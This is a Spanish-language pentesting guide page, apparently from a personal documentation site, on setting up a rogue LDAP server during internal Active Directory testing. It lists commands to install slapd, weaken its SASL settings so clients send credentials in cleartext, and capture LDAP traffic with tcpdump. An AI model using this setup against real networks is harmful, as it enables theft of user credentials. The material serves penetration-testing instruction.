> For the complete documentation index, see [llms.txt](https://www.xtormin.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.xtormin.com/pentesting-en-infraestructuras/red-interna/active-directory/rogue-servers.md).

# Rogue servers

## Fake LDAP

{% code overflow="wrap" %}

```bash
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
```

{% endcode %}

```bash
sudo dpkg-reconfigure -p low slapd
```

Configurar el nombre de dominio que se desee "suplantar".

Crear el fichero que luego se usará para cargar la configuración en el servicio LDAP:

```bash
vim olcSaslSecProps.ldif 
```

Establecer una configuración insegura para la captura de credenciales usando la siguiente config:

```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

Cargar la configuración en el servicio y reiniciarlo para que haga efecto:

```bash
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo systemctl restart slapd
```

Comprobar configuración:

```bash
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```

Capturar paquetes con tcpdump:

```
sudo tcpdump -SX -i breachad tcp port 389
```
